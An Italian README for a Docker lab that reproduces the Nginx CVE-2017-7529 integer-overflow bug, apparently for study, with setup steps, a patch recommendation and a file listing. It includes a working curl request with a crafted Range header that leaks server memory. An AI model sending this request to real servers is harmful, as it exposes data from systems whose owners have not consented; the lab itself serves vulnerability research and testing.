
Ambiente di riproduzione basato su Docker per la vulnerabilità di overflow di interi in Nginx CVE-2017-7529, che dimostra la divulgazione di informazioni tramite intestazioni Range create ad hoc con una guida passo passo allo sfruttamento.
Nginx è un server web ad alte prestazioni, ampiamente utilizzato come reverse proxy, server cache e altro, ed è un software open source.
Nelle versioni di Nginx precedenti o uguali alla 1.13.2, esiste una vulnerabilità dovuta a un integer overflow, che consente a un utente malintenzionato di manipolare l'header Range per ottenere frammenti di memoria o informazioni sensibili al di fuori dell'intervallo di risposta originale.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
Questa vulnerabilità può causare una divulgazione di informazioni (Information Disclosure) tramite una semplice richiesta HTTP.
Se includesse dati sensibili come configurazioni o altre informazioni esfiltrabili, potrebbe portare a gravi incidenti di sicurezza.
Patch: si raccomanda l'aggiornamento a Nginx 1.13.3 o successivo.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- Questo documento